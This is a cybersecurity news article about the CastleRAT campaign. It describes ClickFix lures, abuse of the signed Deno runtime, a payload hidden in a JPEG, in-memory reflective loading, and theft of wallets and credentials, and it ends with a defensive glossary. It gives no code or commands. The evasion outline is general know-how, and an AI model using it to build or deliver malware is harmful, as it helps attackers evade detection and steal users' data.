Trusted Tools, Treacherous Tricks: How CastleRAT Weaponizes Deno to Evade Enterprise Defenses

It began with a simple browser error. A pop-up nudged the user to “fix” the issue by copying a command into their Windows terminal. What followed was not a routine repair, but the opening act of a sophisticated digital heist - one that would expose a new frontier in cybercrime, where even the most reputable tools are twisted for malicious gain.

Fast Facts

• CastleRAT is the first known malware campaign to exploit the Deno JavaScript runtime for stealthy attacks.
• The initial attack leverages a social engineering trick known as “ClickFix,” luring victims into running malicious commands themselves.
• By installing Deno - a trusted, signed runtime - the attackers bypass traditional antivirus detection.
• Payloads are concealed in seemingly harmless files, including a JPEG image, and decoded in memory to evade file-based scans.
• CastleRAT targets sensitive data, including cryptocurrency wallets, browser history, and developer credentials.

The Anatomy of a Modern Malware Masterpiece

ThreatDown Research’s recent findings have rocked the cybersecurity world: for the first time, attackers are leveraging the Deno JavaScript runtime - a tool trusted by developers worldwide - as a launchpad for CastleRAT, an advanced remote access Trojan.

The attack’s ingenuity lies in its simplicity and psychological manipulation. It begins with the “ClickFix” ruse: a user, frustrated by a persistent browser error or CAPTCHA, is encouraged to paste a command into their Windows terminal. Unbeknownst to them, this action downloads and installs Deno, a legitimate runtime that, thanks to its digital signature, glides past most antivirus defenses.

But this is only the opening move. With Deno in place, attackers execute obfuscated JavaScript code, using Deno’s trusted status to run malware with elevated privileges. The malware then fetches additional components: a Python environment (disguised as “Petuhon”) and a suspiciously innocent JPEG file. Hidden within the image is the encrypted CastleRAT payload.

To maximize stealth, the attackers use reflective PE loading - a technique that decodes and runs the malware in memory, leaving no trace on disk for traditional antivirus tools to find. The Python script, shielded by PyArmor, ensures the payload remains opaque and encrypted until the moment of execution.

Once active, CastleRAT acts as a digital spy: it logs keystrokes, hijacks the clipboard, and seeks out valuable data such as cryptocurrency wallets and developer credentials. All stolen information is quietly transmitted to remote command and control servers, far from the victim’s prying eyes.

This campaign’s success is a stark reminder that cybercriminals are not just writing new malware - they’re innovating in how they deliver it, exploiting trusted software and human psychology alike. As traditional, static defenses falter, experts urge organizations to adopt behavioral monitoring and advanced endpoint detection to catch these subtle, sophisticated attacks in action.

Conclusion: When Trust Becomes a Trojan Horse

The CastleRAT-Deno campaign signals a dangerous new era: when even the most reputable developer tools can be repurposed as weapons. Security teams must now watch not only for suspicious files, but for suspicious behaviors - even when they’re carried out by “trusted” applications. In this shadowy arms race, vigilance, adaptability, and a healthy dose of skepticism are the new keys to survival.

WIKICROOK

• Deno: Deno is a secure runtime for JavaScript and TypeScript, designed to run code outside browsers with enhanced security and modern development features.
• Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
• Reflective PE Loading: Reflective PE loading lets attackers run malware in memory, bypassing disk-based detection and making forensic analysis more difficult for defenders.
• Obfuscated JavaScript: Obfuscated JavaScript is code deliberately scrambled to hide its true purpose, making it hard for humans and security tools to analyze or detect threats.
• Endpoint Detection and Response (EDR): Endpoint Detection and Response (EDR) are security tools that monitor computers for suspicious activity, but may miss browser-based attacks that leave no files.